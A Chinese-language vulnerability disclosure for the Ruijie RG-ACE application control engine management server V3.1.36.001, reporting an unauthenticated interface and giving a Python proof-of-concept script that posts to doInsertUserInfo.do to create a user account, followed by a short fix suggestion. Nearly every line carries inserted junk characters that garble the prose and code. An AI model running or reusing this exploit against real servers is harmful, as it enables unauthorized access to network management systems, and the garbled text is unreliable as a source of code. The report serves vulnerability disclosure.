锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)) P- d! u1 O2 j6 k2 ~
1 _; x/ _4 r$ d+ l
, l$ B# U! u3 ~. t+ p9 O测试的具体版本是
- W& X$ `( w' ^* | Z产品名称: 锐捷应用控制引擎+ p$ {! G. J. c
版本号: 3.1.36.001 TC
; @- D4 D% e0 R( W3 B7 [ M$ s编译时间: 201104291730
) w$ k/ z( \% X+ E
: L. c% h9 X* S! m4 g: n* w- [9 ]& Y" u/ E
漏洞证明:' h1 X; j! `: ^' I
9 i3 B+ g8 [1 b
& @- W" U1 m5 {( U
9 E; _' [0 Z' M1 P, @0 n# D _
' y" z& r) }. T; x1 O
9 K" E$ @4 L1 A- B3 |3 N$ t4 P' B, ^
执行脚本3 k/ p; b) J: g8 k" w
#! /usr/bin/env python
2 W2 z5 ?, v q2 ~ y#coding=gbk3 b# {8 ] W$ l4 L
#RG-ACE管理服务器 V3.1.36.001
. o" A: S4 y$ k5 Mimport urllib2, urllib,cookielib5 s4 D. U* S, c/ n c
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP0 A! e; a( w' T3 B: P
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
4 L9 m' s) B# \7 G) Ropener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]1 ^- h+ P( L2 |( c
post=(("event","userManager.doInsertUserInfo"),+ ]0 S3 e7 R, H
("useractionname","addButtonValue"),2 i4 s% @: f v% L
("useropermanager","userManager")," z1 P& _6 V! S+ |2 ^
("userName","t"), #######账号自己加" s' Z" i" ?+ D# K: T4 H7 ^; h8 I
("pwd","aaaaaa"),######密码自己加
2 B4 j% q8 z n("trueName","ad"),
9 n5 n, m5 ^; L("email",""),
& R* V0 b+ m* Z$ `("mobilePhone",""),
. S1 g- Z N4 l("officePhone",""),
% r: h) y; z3 u3 j- u' `("addr",""),
# {+ Z& j9 H' h: h("submit","确定"))
a8 _7 K$ m a* vurllib2.install_opener(opener)3 s1 D4 M6 _% e4 J7 i
p=urllib2.urlopen(url, urllib.urlencode(post)).read()2 y7 e) H2 s9 {, h- N# r
print "Done"
) |8 Q" S/ J* R ~6 ^- D, D3 _. y6 C
- I; y# Z. G! ^: a' |登录,连接设备- b% c( ~7 f$ N A) m; z. \
! r& I0 v; E* f6 @+ a, s( ^
' N" b/ k$ Y3 u/ V9 \% o' ]- C
1 u2 L" d/ Z* B3 H& u, h
$ p+ Y) P7 e. Q) g, r- U# J3 [) ? M
默认的管理员admin权限更大点9 o7 _: {( ~: H% [- b
9 u- ]. Q1 l" G7 j; Q s
! }. W0 J' ~4 T
5 p# k: p' U# B6 [9 ?/ p7 v. x 7 z' J* X- X. G* S% E2 a! u
- b# }) j0 Z" V1 @" |$ z
修复方案:! c8 [& n* G* @6 O F
加强对接口的权限验证
5 s& l$ J0 E" i" G. U7 O4 U/ y, g5 r
* x" e' q$ ~; i/ ]9 ]2 g* _( A |